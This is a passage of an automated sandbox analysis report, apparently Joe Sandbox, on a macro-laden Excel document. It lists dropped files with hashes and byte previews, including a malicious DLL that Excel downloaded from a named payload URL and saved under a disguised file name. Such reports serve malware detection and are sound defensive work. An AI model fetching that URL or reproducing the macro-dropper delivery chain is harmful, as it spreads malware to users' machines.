                                                                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.3.2.<./.P.i.d.>.......
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5565.tmp.dmp
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Wed May 12 11:34:10 2021, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42306
                                                                                                                                                          Entropy (8bit):2.3453773527449613
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:lA5m/ZivMeOugvCm+CFPutUdCvQKkmXMsWOwP2f19fkELxMCnsG:lLQyx5sUgvQ4lA292EbsG
                                                                                                                                                          MD5:7398A2F851BD34E393B519BF1E875277
                                                                                                                                                          SHA1:5115EAD153C056703D6FC041D332D856FF3CAB2B
                                                                                                                                                          SHA-256:CCC5B089CBE993673B437B9CEE5BE4E4BCF8999F74F84A77ECE9EC01813517A5
                                                                                                                                                          SHA-512:D98FF340312BD064002C9C54F5ACE140647411D0A72825D17B9D0D3DA8A54B4B281C3BB9CFF6633DFE13EB3C7D44DF58C4467B7EF368DA24830C05F3672BCE6E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: MDMP....... .......2..`...................U...........B..............GenuineIntelW...........T...........)..`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER58B7.tmp.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4621
                                                                                                                                                          Entropy (8bit):4.449817238256939
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwSD8zsyJgtWI9fvWSC8Bm8fm8M4JkMGEF8wy+q8sSdMKJYbgd:uITfAk+SNVJYNqYbgd
                                                                                                                                                          MD5:A0F1A7247BFAC0C9B73858DC79665D7E
                                                                                                                                                          SHA1:19301FF2E82290A794A2469DEB078EC2C4FF2AAD
                                                                                                                                                          SHA-256:A8B9192922BEC62DEF51699075A59623E048621259670145027438E468A2D755
                                                                                                                                                          SHA-512:BC3B7755771F262EADA33BAB6A9589568752ABAC59B5D6FD5EB1929E7DEEEB9931CC08E57A6FFF1DB3D05E750732261E63652B7400D4AE5074C6DFAD13ADA39A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986203" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER611E.tmp.WERInternalMetadata.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8258
                                                                                                                                                          Entropy (8bit):3.690894055322852
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Rrl7r3GLNic+6IOEUe6YqMSURgmfJdpSN+pBB89bKesfh9mOm:RrlsNi16IOW6YRSURgmfJdpSlKdfh9m
                                                                                                                                                          MD5:9AEBAB314B2BD9AF417BC87D58172805
                                                                                                                                                          SHA1:5B4DE827B9E4EB11B844A1C938674B4C3DCBDF7D
                                                                                                                                                          SHA-256:BAF40699EC1503DC290CDCBC12CBC16E79BF643F16901820BD3391A0B62FDBC6
                                                                                                                                                          SHA-512:C3D8CC098D9B61ADF6D89E5B0F9CA41C236741B7449581288E6F2099C724B26CDE6B2EBE3E7D15B231D4E1B4A343FBA0729E8C4A050380E8883A66F348D630FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.8.0.<./.P.i.d.>.......
                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER640D.tmp.xml
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4621
                                                                                                                                                          Entropy (8bit):4.450060334493844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwSD8zszJgtWI9fvWSC8BP8fm8M4JkMGEF/Q+q8sSdUKJY5gd:uITfNk+SNGJAZqY5gd
                                                                                                                                                          MD5:BA42F4ED21FCF20EA61DE53019AFF2E6
                                                                                                                                                          SHA1:5F31D906B4D7898680740E47012E551444C41329
                                                                                                                                                          SHA-256:E8909D4B3BCEF7BB6D8526B105E79A8BC69CFF24755013DAA5091CB5A24CB7BF
                                                                                                                                                          SHA-512:820EEABF7A4172B5A0D469F7D5C38FF6F77AC283469EC5D294432C78BD50FC22860F2FB97D8E3A0E824C3B57259FF39BB8D8F7E1313E44415EF781696638ED15
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986204" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9B0D8C85-82C2-4C91-AEDC-B9459681EEEA
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):134558
                                                                                                                                                          Entropy (8bit):5.36837155136519
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:IcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:vEQ9DQW+zPXO8
                                                                                                                                                          MD5:421B3B97C4DD0FB55E325A1D2AE0D0C8
                                                                                                                                                          SHA1:52C5DC8226280C0F3A5E9A7005B20768E0CF4250
                                                                                                                                                          SHA-256:44A5C380DB28AF6E10E6037428D4E955FD1324511F0E03656134371F86DC9DDB
                                                                                                                                                          SHA-512:EF9CC8A5F9C09FF5C23FEE36F40DBE56241ACC2E90CFED934A04D775281EFBF61133E62C7E805777964C634219A7758A2F190B63CD3772962BCBF6B08A40ED02
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T11:32:25">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):395500
                                                                                                                                                          Entropy (8bit):6.001802978220178
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:AJh65mtNNZQJjumcc/9zZppSFR1qY2/N33i7eVZ5qP3Ca6xzDthbrath0PIk:AJBNNcjuQ/9zoaV3EeVHq/Ca6Vbrdg
                                                                                                                                                          MD5:79E922F1BC80F1C6D9F7273DD2CC67A7
                                                                                                                                                          SHA1:31502F7EFDE63CD3FAE8C1258458CC9070A51749
                                                                                                                                                          SHA-256:25C075C6919DFB86DF81D3E868D1420D88522746ACA34946E864145AD588E5E0
                                                                                                                                                          SHA-512:3116A44D4287F3F585FEFB5D527460D33F0E724879129F6AF2822BD4B8170D7593982AB21575179E3B1480A286A0135BEB2BF7B2F6589E26C21D468BF97919A0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          IE Cache URL:https://signifysystem.com/ceg7AX7oN0o/ue.html
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\E0C40000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):81548
                                                                                                                                                          Entropy (8bit):7.910222120901931
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:sjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJDt:g+nHSD8YZo/Uh0ZymYQ0y7FAL5t
                                                                                                                                                          MD5:3FAF6C9EC3CA97F2FDBB16AAF7F21538
                                                                                                                                                          SHA1:6EE949BBC6EEAA09970FA0F0712DC63B3ED3351E
                                                                                                                                                          SHA-256:69824A86AA6A1E806A3B6820C01045130690515875A7E23B4E3C5FE73C7C96A2
                                                                                                                                                          SHA-512:26D9E11FF580999CE2D40C4FED2477BD50A003B26E55BF0440C9CD45F867DD91BEE09F04663761FB4581B4DC6566BCED9FE02351A6A447BE6C53D6EA946B7D10
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9659e9a8_by_Libranalysis.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=177152, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2250
                                                                                                                                                          Entropy (8bit):4.705815148671922
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:8Izi0Eoq2VOEEwcNaOExB6pIzi0Eoq2VOEEwcNaOExB6:82i0lqeFyNaFxK2i0lqeFyNaFx
                                                                                                                                                          MD5:6FA30B3E904D62A12E94BEE14F7A29A1
                                                                                                                                                          SHA1:66A94FD22924AE600B07172BCD57AA86E967E6BE
                                                                                                                                                          SHA-256:4B48D4C6FC7E4A305D4FDC86A3D220DC564E7F21E9B34D71C1CBA69D956CA4B0
                                                                                                                                                          SHA-512:B584A61F1ECFFE4D7BD8FFF85DD87790494A37B1069E1106C744383F832AEFCF944DD05072A9D8DC682D04C54A47A169BC318A91BEE54F14D4AACE139DED0BF3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: L..................F.... ...o..S......}"G....}"G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.\.....Y..............>.....d.'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.\ .9659E9~1.XLS..j......>Q{<.R.\.....V........................9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\9659e9a8_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...L................!a..%.H.VZAj...L...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=8192, window=hide
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):904
                                                                                                                                                          Entropy (8bit):4.669574121320632
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:8d1XUSduCH2KO0E4isQ9J+WrjAZ/DYbD0RSeuSeL44t2Y+xIBjKZm:8dBi0+P9vAZbcD037aB6m
                                                                                                                                                          MD5:B25CFCF82131C1477BE254A8197AC4D7
                                                                                                                                                          SHA1:C9F9DD0B2A241654D3CABF53181C9104F72A4F33
                                                                                                                                                          SHA-256:BA2619BEC415B0F8436042E36185BFCDA8A399E1ED772FDE3EFFE088561031B9
                                                                                                                                                          SHA-512:9154445B77F891BF81113FEB819F84040B5C60FF1C0AEC44E6B8AE33A1CBE945E81EE452666C022E2FC134CFFE8D2B9CF90835C66C56CF4C615DD6D1014FE591
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: L..................F.............-.....}"G..$U.}"G... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1......R.\..Desktop.h.......N...R.\.....Y..............>......XI.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):125
                                                                                                                                                          Entropy (8bit):4.664326784625596
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:oyBVomMEcx14HdGUwSLMp6l7cA14HdGUwSLMp6lmMEcx14HdGUwSLMp6lv:dj6L4HdhNrP4HdhNbL4HdhNf
                                                                                                                                                          MD5:43AA6DB16A8F46F4ECBA390A0C27654B
                                                                                                                                                          SHA1:F81E4099E1ACBCB5C5C1FDEABD4EF079DBD32D32
                                                                                                                                                          SHA-256:41876EF74BEE90E671EC9ACD42CB627C0F108FCE02EEE7523A101F3410D1ABB1
                                                                                                                                                          SHA-512:1DBE7DAF0D2596E53585C49617EB89F46A4F135B81565FC52D51CF0F94D4C27B253A43966D6765A6412527A1DDF886C280A4C867316F53536E95D1DF9CA3FDF6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: Desktop.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..9659e9a8_by_Libranalysis.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..
                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22
                                                                                                                                                          Entropy (8bit):2.9808259362290785
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                          MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                          SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                          SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                          SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                          C:\Users\user\Desktop\02C40000
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):228873
                                                                                                                                                          Entropy (8bit):5.616544637493411
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:a7NiRdSD8YNoTU90uJfzn3b20X7vrPlsrXvLlL7LF7Niux:bRdTrTU9Z0qux
                                                                                                                                                          MD5:09AEDE7585D5AD0099BEB6C37CD691D3
                                                                                                                                                          SHA1:EAAB1B9AAA1E3704BB0CDC619BBD70F5DF20A0CB
                                                                                                                                                          SHA-256:D989BDABA142C45F0AE3CD17B74C1E3AC5476D5FF00E9687414FFA08A105D744
                                                                                                                                                          SHA-512:0C2A3363F0FC9CB81144ACAF80906FA617D5DEF59E794286E24828F05032429F4BACB2C4BB635179331F4F8B2024B04AC69CD2CDA3EC725445FE6466171C9A18
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................E..C.a.l.i.b.r.i.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..C.a.l.i.b.r.i.1...,...8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......<........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1...h...8........E..C.a.m.b.r.i.a.1................E..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............
                                                                                                                                                          C:\Users\user\ritofm.cvm
                                                                                                                                                          Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):395500
                                                                                                                                                          Entropy (8bit):0.00837191942417358
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:idqwHVg3F+X32RuZm6wY/Flmml/eVS3XJMgFKR+vlfq:eH1GSGUZmBYNcSWcnugFKR8l
                                                                                                                                                          MD5:B3D98EABC7EAB34E9E3EF6D7A9D24385
                                                                                                                                                          SHA1:B9711AA2FE0E5B7136BDF56C120A8D490569BE0D
                                                                                                                                                          SHA-256:B7C7FFE3ACD3A9FDBC2DF68B3B999E33D29A43B0235FBD68DB6BE8970008E872
                                                                                                                                                          SHA-512:5F6940C42F8D621D813A9C4D42A45DCB81AC1A113EB05B85DB80B0C47AC69727C44F8B9138A8D3C68308F2EC8571D829FFBC800DD4B3EF1686CECEDC85C72AEE
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                          Entropy (8bit):3.258986427712615
                                                                                                                                                          TrID:
                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                          File name:9659e9a8_by_Libranalysis.xls
                                                                                                                                                          File size:375808
                                                                                                                                                          MD5:9659e9a80fba8f055fbe4e3757b0fd88
                                                                                                                                                          SHA1:701af32440a369d3bf1533cf3d741904b614a470
                                                                                                                                                          SHA256:252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
                                                                                                                                                          SHA512:2f94eeed0b1cbc7c7e13fbb66ffca3ba193118d5457b85ccfbf81f4f85406d91853383b34e0553a9f9130327d167f1fc5786d8d7935e6a67fa0c4e3a4fd37167
                                                                                                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcd:vUGAt6Uqa5DPdG9uS9QLp4l+s+o8
                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "9659e9a8_by_Libranalysis.xls"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:True
                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                          Encrypted Document:False
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                          Summary

                                                                                                                                                          Code Page:1251
                                                                                                                                                          Author:van-van
                                                                                                                                                          Last Saved By:vi-vi
                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                          Security:0

                                                                                                                                                          Document Summary

                                                                                                                                                          Document Code Page:1251
                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                          Contains Dirty Links:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4096
